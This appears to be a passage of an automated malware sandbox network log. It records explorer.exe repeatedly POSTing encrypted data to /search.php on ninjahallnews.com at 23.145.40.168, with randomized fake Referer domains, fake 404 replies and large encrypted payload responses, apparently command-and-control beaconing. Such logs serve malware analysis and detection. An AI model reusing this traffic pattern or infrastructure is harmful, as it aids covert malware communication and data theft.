                                                                                                                          2024-10-08 16:24:35 UTC310OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 67 34 01 83 b7 25 93 3c 41 df 6e ee ac ee 0e 3f ca 76 16 85 5e 8b d1 62 7a c3 2e 29 70 bc c2 91 3a d1 a6 60 79 8d ea 44 bf 30 70 f3 f5 6a 04 3e 0b 2b 4a df 1f aa ec d4 24 8d 97 2b 16 13 e6 6f 24 b5 70 55 94 8c ff 84 56 73 a8 5a b1 4c 88 39 71 b6 21 d9 7a 4e 2c 78 41 d7 b2 6b fa bb 16 dd 24 76 e3 fd d6 10 e5 fe 5d b7 c4 93 ad 08 4d d1 ca da 73 08 d0 63 39 ec 6b 14 12 86 3a 6e 21 df 33 74 40 85 95 c2 05 78 b5 a4 72 ea 34 db d0 d1 0f 6a 39 2d a2 09 0e 4d 1a 7a b5 4d b9 d9 2d 59 10 54 03 88 e6 6d 79 1d 43 85 90 ce 48 95 a3 37 d2 2c cb 98 e5 b6 65 d5 21
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@Lg4%<An?v^bz.)p:`yD0pj>+J$+o$pUVsZL9q!zN,xAk$v]Msc9k:n!3t@xr4j9-MzM-YTmyCH7,e!
                                                                                                                          2024-10-08 16:24:35 UTC278INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:35 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          16192.168.2.66144823.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:36 UTC284OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://ndvftlyrsws.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 353
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:36 UTC353OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 64 34 01 83 b7 25 93 3c 3d ea 7b f4 cc d0 11 2c ad 3b 6b ea 7b c1 80 20 38 e7 15 58 3b ca cb d4 47 ed c8 68 15 f5 91 27 85 72 62 f1 fd 63 00 27 70 14 1f f4 6f c4 e8 b7 25 f3 fc 4f 07 01 a7 5d 52 ea 7e 61 9d e9 8c b7 17 79 89 67 e6 29 e0 7d 31 d6 41 d2 29 3f 6c 30 65 c5 d9 15 e7 9b 17 8c 29 7e da e3 8d 36 c1 f9 08 fc d1 8c d7 4a 79 bb 8f dc 7b 2e d6 7d 5d c8 02 0c 17 96 4b 1b 34 a3 43 3d 44 fe a9 8e 7d 49 a2 d4 3a 96 77 ca b8 dd 6d 3e 21 59 fe 16 2c 58 0d 61 ac 54 ee de 7f 46 13 3e 04 e2 a2 3a 4a 52 3d b0 82 ee 2b 87 a5 38 87 7d cc 9f c2 89 1c 8f 58
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@Ld4%<={,;k{ 8X;Gh'rbc'po%O]R~ayg)}1A)?l0e)~6Jy{.}]K4C=D}I:wm>!Y,XaTF>:JR=+8}X
                                                                                                                          2024-10-08 16:24:36 UTC278INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:36 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          17192.168.2.66144923.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:36 UTC288OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://vsqfnosbtpkyeiw.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 291
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:36 UTC291OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 65 34 01 83 b7 25 93 3c 58 c1 05 b6 87 c7 5a 40 b7 2f 12 eb 46 86 d0 74 75 c9 28 50 7e a4 cc ed 41 f1 ec 11 07 80 be 28 87 2c 25 ba 87 6b 0f 25 1c 3e 03 e4 6c c1 f9 ab 46 fd 94 3e 2c 39 8f 02 2d a1 47 6f 90 cb b1 b8 20 7d d3 42 a7 7c 83 1a 21 d0 5a 8b 5f 3a 3a 3d 67 ab ed 6b ed ab 71 ee 57 0e ce be b8 38 b3 eb 47 f1 b3 98 9b 23 6c 87 86 ba 06 59 aa 57 2d 8b 6c 13 2a 8b 7f 3c 61 e7 48 1f 02 d9 d7 9a 61 4c be da 23 a1 21 cc d5 c3 68 30 20 7c ce 00 69 4d 29 7a ed 50 fd c9 7e 0f 64 66 15 80 b1 48 2d 51 0f de fe ec 13 f0 a3 1e d0 5b 90 93 c9 8b 77 99 4c
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@Le4%<XZ@/Ftu(P~A(,%k%>lF>,9-Go }B|!Z_::=gkqW8G#lYW-l*<aHaL#!h0 |iM)zP~dfH-Q[wL
                                                                                                                          2024-10-08 16:24:37 UTC294INHTTP/1.1 404 Not Found
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:37 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-10-08 16:24:37 UTC7898INData Raw: 31 65 65 37 0d 0a 00 00 b5 50 0f 6d f7 61 d7 e7 49 78 ba 09 bf db 6e 5b 92 64 4f 0c f1 aa 5d 78 6e 1d 37 6e a3 bf 51 b7 61 50 c8 4c 75 ec 96 6c 61 47 6f 72 d9 5d 28 4a c9 17 cf ae b0 92 75 82 7c d6 cc 92 b4 cc 04 6e 80 d9 27 08 88 90 7c 25 38 3b 06 b0 d9 98 1f b3 ee 24 b2 8e 94 c4 c7 84 78 7f df ff 07 32 07 d4 23 b4 c2 cf a3 d9 18 29 4c b6 6d 7e 16 31 ba 88 9c 6f 27 9e 77 77 ec 42 27 39 f1 c8 b5 0f 2b 2c 37 f5 27 0c ee 96 8c 2c eb 7f 13 2a 58 0b a1 c6 4a a5 04 a5 ee 06 88 e3 1d 96 d0 4c d7 1a 1c 0b 6e 31 a2 fd 08 4f 89 d7 29 16 31 bd a7 21 aa 5c b5 b5 55 45 44 dc a1 75 85 c1 e8 06 3a f3 80 41 02 4f fe 76 f4 a8 10 4e 8c 77 26 ec 91 05 1d da 3e 11 60 70 e2 86 3d ef 6e dd fe db a9 55 d9 c9 5b 8a 82 ba 08 34 ee fb c7 34 41 b5 cd 3a 1d 0c d7 46 85 07 8f 3d 07
                                                                                                                          Data Ascii: 1ee7PmaIxn[dO]xn7nQaPLulaGor](Ju|n'|%8;$x2#)Lm~1o'wwB'9+,7',*XJLn1O)1!\UEDu:AOvNw&>`p=nU[44A:F=
                                                                                                                          2024-10-08 16:24:37 UTC19INData Raw: 1a 58 b3 14 d0 ff ef 1b ab d5 44 9d a9 19 24 1b 3c de a6
                                                                                                                          Data Ascii: XD$<
                                                                                                                          2024-10-08 16:24:37 UTC2INData Raw: 0d 0a
                                                                                                                          Data Ascii:
                                                                                                                          2024-10-08 16:24:37 UTC8192INData Raw: 32 30 30 30 0d 0a 4f b0 ac 7b 5b 94 2f 8e fb a5 49 75 0f 40 51 70 86 33 86 ea 54 c2 9c a9 b3 9c cf 10 ce 73 f3 0a 45 73 70 80 bd cf 7c c6 1c 25 20 f0 db 31 01 72 f0 5d 54 16 83 19 c9 78 43 66 d9 c7 7f 47 ca 0f f7 a2 70 1e 62 4f 97 d4 85 58 23 aa d0 91 09 29 ee 80 ff 8b 54 15 25 28 bd e0 44 37 f5 d2 98 eb 0f e0 d6 36 42 df 9d 30 3b 76 0a 49 8d d8 2a 5a 2c 48 85 64 39 6f df 29 ee ea 49 62 42 61 fc 57 6e 83 9a b6 22 77 a6 6b e0 cf c9 e4 7a 54 6a 49 6b 6f 35 b7 56 48 95 56 16 b2 96 49 9e ba 4c 2c 9b 9c 43 42 13 5b a3 ab 34 c0 82 5d a9 9e 70 45 78 63 d2 8a a7 06 b3 53 cc e2 23 f1 5f eb 82 a9 0c ba 27 c8 99 eb 5e 0c 15 68 6c d4 ae e1 12 2f 24 0c 48 6d a6 03 50 bc 8c c8 19 7b 50 c9 e8 5e 04 70 28 b9 77 49 81 50 c8 50 6b ae b4 0b 13 a5 ca 64 4c e6 f3 cd d4 f6 e4
                                                                                                                          Data Ascii: 2000O{[/Iu@Qp3TsEsp|% 1r]TxCfGpbOX#)T%(D76B0;vI*Z,Hd9o)IbBaWn"wkzTjIko5VHVIL,CB[4]pExcS#_'^hl/$HmP{P^p(wIPPkdL
                                                                                                                          2024-10-08 16:24:37 UTC6INData Raw: 4e 13 8c ae b0 c7
                                                                                                                          Data Ascii: N
                                                                                                                          2024-10-08 16:24:37 UTC2INData Raw: 0d 0a
                                                                                                                          Data Ascii:
                                                                                                                          2024-10-08 16:24:37 UTC8192INData Raw: 32 30 30 30 0d 0a 37 b0 80 d9 81 f6 4b 57 1e 8f 04 5f c4 c0 88 47 ee 18 f5 d8 ff a1 a2 c6 ae 36 1a 9d e0 fb 7a 50 95 22 b5 51 4d 25 b1 f4 18 0c 15 d1 06 0a 15 7b 23 d8 b9 63 41 09 53 8b 61 24 04 92 dd b9 c9 34 db 29 b1 d3 b5 7d 9b b6 ff 21 7f 68 a3 a1 98 ca f2 df ce 52 bb f4 67 4b 05 db df 01 f6 41 65 c4 8c 63 3c 95 b8 4a 79 8f 0e fc ec 98 91 1c 6c 75 27 c8 43 8c b3 ad 55 8f 66 a4 df a5 4c f4 c9 c1 69 5d 48 0b 4f 32 71 7a 52 6c c0 39 48 fa 96 d0 c8 ec f4 9c a0 0a 28 2c 0e 70 0f 5f 56 3f 57 12 a8 f7 ec d3 73 0d 42 60 a6 37 ca 65 e1 1c 43 c8 32 77 4f a8 25 84 73 8c 57 fe fd 9b 22 07 c9 76 67 b6 ef 85 11 52 c9 bf 4e b0 d6 66 9d d8 30 3f 8d 93 5a f5 d5 f3 5f 31 3d a5 2e 45 85 49 21 aa 61 86 37 f7 f5 9a 70 4c 4d f9 1c fb e1 fe d1 ee cb fa 02 71 1e 89 dd 8a 35
                                                                                                                          Data Ascii: 20007KW_G6zP"QM%{#cASa$4)}!hRgKAec<Jylu'CUfLi]HO2qzRl9H(,p_V?WsB`7eC2wO%sW"vgRNf0?Z_1=.EI!a7pLMq5
                                                                                                                          2024-10-08 16:24:37 UTC6INData Raw: eb 47 a6 2d 95 51
                                                                                                                          Data Ascii: G-Q
                                                                                                                          2024-10-08 16:24:37 UTC2INData Raw: 0d 0a
                                                                                                                          Data Ascii:


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          18192.168.2.66145023.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:38 UTC288OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://viuhsicxwcdmbdc.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 342
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:38 UTC342OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 41 4c 65 34 01 83 b6 25 93 3c 3c fb 7d bb b5 d2 56 0a e7 6f 0b e8 59 fb c8 73 79 eb 3b 3e 7c da f9 99 54 eb d2 13 78 c5 e4 4a e8 42 38 88 fb 6a 15 41 48 30 06 93 71 ba f1 d0 46 cf fa 74 68 33 f2 5b 2c ec 37 4b 9b d4 84 d7 38 28 cc 7f ce 52 aa 17 4c 81 01 be 4a 7f 64 7b 48 bd cd 42 a1 ac 13 c1 3e 70 99 cf 80 55 c6 86 53 e9 a5 ef cc 33 51 8e 8f 9e 06 2d af 60 28 fa 0a 55 38 e5 3a 1d 38 d8 11 1e 5d eb 8b dd 6d 3b 89 e7 17 8b 58 89 cc da 03 65 6d 34 b1 4d 7c 10 3b 65 ed 09 e0 be 1a 33 25 21 1e 9d bf 40 62 4f 3f 9b e9 e7 57 f7 d2 1f 94 41 c3 e4 da 88 73 95 68
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[ALe4%<<}VoYsy;>|TxJB8jAH0qFth3[,7K8(RLJd{HB>pUS3Q-`(U8:8]m;Xem4M|;e3%!@bO?WAsh
                                                                                                                          2024-10-08 16:24:38 UTC287INHTTP/1.1 404 Not Found
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:38 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 409
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          2024-10-08 16:24:38 UTC409INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          19192.168.2.66145123.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:39 UTC286OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://phumebsddarvf.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 296
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:39 UTC296OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 7a 34 01 83 b7 25 93 3c 70 f5 76 91 de f5 1e 15 e5 26 2e ac 72 e5 f0 14 6b e2 08 38 2f c6 ba 8c 73 e2 a7 41 4c e3 87 2f e5 25 31 ff fa 13 1d 31 6e 2c 5a 89 28 c0 93 c1 02 e6 ae 44 0b 1a 97 0e 14 ac 75 72 c2 fd bf b7 3d 28 a4 13 d2 6d f3 71 64 a5 53 cf 60 4b 68 17 5f bd dd 19 b7 85 66 80 39 04 e8 c0 8e 44 c2 8b 6d bf a7 8c bc 34 24 b4 8d 98 63 27 b8 1f 2b 98 2b 6e 2e b0 72 68 7f d2 02 36 44 d0 c4 c3 1e 77 c4 b6 02 fe 4b eb a9 c0 0f 6c 78 31 c9 42 72 4a 44 01 ca 50 ae cc 10 5c 79 51 20 df fd 63 24 11 07 8e ed fc 1c f8 df 05 f5 20 96 87 bd 86 16 af 58
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@Lz4%<pv&.rk8/sAL/%11n,Z(Dur=(mqdS`Kh_f9Dm4$c'++n.rh6DwKlx1BrJDP\yQ c$ X
                                                                                                                          2024-10-08 16:24:39 UTC278INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:39 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          20192.168.2.66145223.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:40 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://oqtouvjrjhoopu.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 360
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:40 UTC360OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 7b 34 01 83 b7 25 93 3c 6e d9 76 e1 97 cd 54 39 d2 28 68 b2 4f ed cd 18 67 d8 74 48 44 be a0 eb 6e aa a9 0c 08 c2 ac 68 fa 50 39 95 9b 06 14 78 6e 10 51 db 2c 8a ce da 53 84 fc 22 06 05 aa 07 34 d4 32 1b c8 c6 e6 92 4a 65 ab 0d fb 5f bf 6e 5c a1 13 b3 38 26 44 77 77 a9 bd 06 ea af 1f e5 50 02 c3 dc 81 12 b3 f9 79 bc 8c 86 b7 0a 4c 8d 98 d7 64 52 d4 49 38 dd 1a 19 31 98 68 62 2f b2 36 61 01 e2 8d e4 1f 6e 98 c6 7a b9 79 e3 f0 c0 00 67 3d 54 c5 70 35 0c 3d 1e f5 39 ec c0 06 0a 09 41 45 91 eb 21 74 16 0d b3 d0 f2 4d d9 e2 3e ec 2c d8 b6 da b4 14 d5 5f
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@L{4%<nvT9(hOgtHDnhP9xnQ,S"42Je_n\8&DwwPyLdRI81hb/6anzyg=Tp5=9AE!tM>,_
                                                                                                                          2024-10-08 16:24:40 UTC278INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:40 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          21192.168.2.66145423.145.40.1684433536C:\Windows\SysWOW64\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:46 UTC286OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://ninjahallnews.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 501
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:46 UTC501OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 85 a6 6e 6c f2 e8 91 75 49 50 20 67 33 fa a7 84 c7 89 05 40 0c 18 e8 5a dd 46 4c 6a 34 01 83 b7 25 93 3c 48 cf 15 91 a3 dd 2a 25 c6 00 16 9c 51 e5 e3 1b 09 bf 67 33 46 c9 e0 f3 49 fe fe 76 77 f7 96 5d 8f 33 2d 87 e5 6a 0e 47 6b 11 28 eb 19 bb 96 8a 06 8b e6 69 22 2e 90 41 39 b6 26 46 ed f7 99 a5 69 56 b5 62 da 54 94 20 7f ae 3f 85 54 4b 4c 0b 75 ad cd 7c ad ca 1e d8 3d 79 ef cf 8f 3a dd bf 5a 9c b9 91 a3 17 4e b1 d1 a2 74 0f ad 74 2f 89 29 43 37 e6 6e 70 7c c9 1f 37 0e f1 96 cf 21 5e a8 c9 4d c6 45 c6 c6 ce 3e 63 2c 6d c3 44 0a 0e 2f 1b cb 04 bf a6 0b 0f 18 7b 1c e6 83 50 7e 1d 32 cd cb ec 15 f9 f0 01 d5 78 ac b8 df 9a 5f 86 43
                                                                                                                          Data Ascii: ry`ie2a'C|G|nluIP g3@ZFLj4%<H*%Qg3FIvw]3-jGk(i".A9&FiVbT ?TKLu|=y:ZNtt/)C7np|7!^ME>c,mD/{P~2x_C
                                                                                                                          2024-10-08 16:24:47 UTC287INHTTP/1.1 404 Not Found
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:47 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 409
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          2024-10-08 16:24:47 UTC409INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          22192.168.2.66146323.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:26:00 UTC288OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://vufdhvyhyvwjjkm.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 109
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:26:00 UTC109OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[CLk4%<2eQvb%;=j ,
                                                                                                                          2024-10-08 16:26:01 UTC285INHTTP/1.1 404 Not Found
                                                                                                                          Date: Tue, 08 Oct 2024 16:26:00 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 7
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close
                                                                                                                          2024-10-08 16:26:01 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                                                          Data Ascii:


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          23192.168.2.66146523.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:26:17 UTC285OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://cnafyhqaamox.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 109
                                                                                                                          Host: ninjahallnews.com
